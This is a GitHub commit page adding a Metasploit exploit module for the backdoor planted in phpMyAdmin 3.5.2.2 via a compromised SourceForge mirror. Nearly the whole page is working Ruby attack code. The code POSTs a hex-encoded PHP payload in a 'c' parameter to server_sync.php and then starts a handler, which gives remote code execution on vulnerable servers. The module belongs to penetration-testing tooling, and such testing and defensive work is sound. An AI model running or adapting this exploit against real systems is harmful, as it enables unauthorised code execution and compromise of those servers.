Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP
Browse files

Add exploit for phpmyadmin backdoor

  • Loading branch information...
commit 3ade5a07e7bb1b1f915a6421f3f1df0895e6f16d 1 parent 93dd96d
HD Moore hmoore-r7 authored
Showing with 82 additions and 0 deletions.
  1. +82 −0 modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb
82 modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb
View
@@ -0,0 +1,82 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'phpMyAdmin 3.5.2.2 server_sync.php Backdoor',
+ 'Description' => %q{
+ This module exploits an arbitrary code execution backdoor
+ placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror.
+ },
+ 'Author' => [ 'hdm' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision$',
+ 'References' => [ ['URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php'] ],
+ 'Privileged' => false,
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ 'Compat' =>
+ {
+ 'ConnectionType' => 'find',
+ },
+ # Arbitrary big number. The payload gets sent as an HTTP
+ # response body, so really it's unlimited
+ 'Space' => 262144, # 256k
+ },
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => 30
+ },
+ 'DisclosureDate' => 'Sep 25 2012',
+ 'Platform' => 'php',
+ 'Arch' => ARCH_PHP,
+ 'Targets' => [[ 'Automatic', { }]],
+ 'DefaultTarget' => 0))
+
+ register_options([
+ OptString.new('PATH', [ true , "The base directory containing phpMyAdmin try", '/phpMyAdmin'])
+ ], self.class)
+ end
+
+ def exploit
+
+ uris = []
+
+ tpath = datastore['PATH']
+ if tpath[-1,1] == '/'
+ tpath = tpath.chop
+ end
+
+ pdata = "c=" + Rex::Text.to_hex(payload.encoded, "%")
+
+ res = send_request_raw( {
+ 'global' => true,
+ 'uri' => tpath + "/server_sync.php",
+ 'method' => 'POST',
+ 'data' => pdata,
+ 'headers' => {
+ 'Content-Type' => 'application/x-www-form-urlencoded',
+ 'Content-Length' => pdata.length,
+ }
+ }, 1.0)
+
+ handler
+ end
+end
Please sign in to comment.
Something went wrong with that request. Please try again.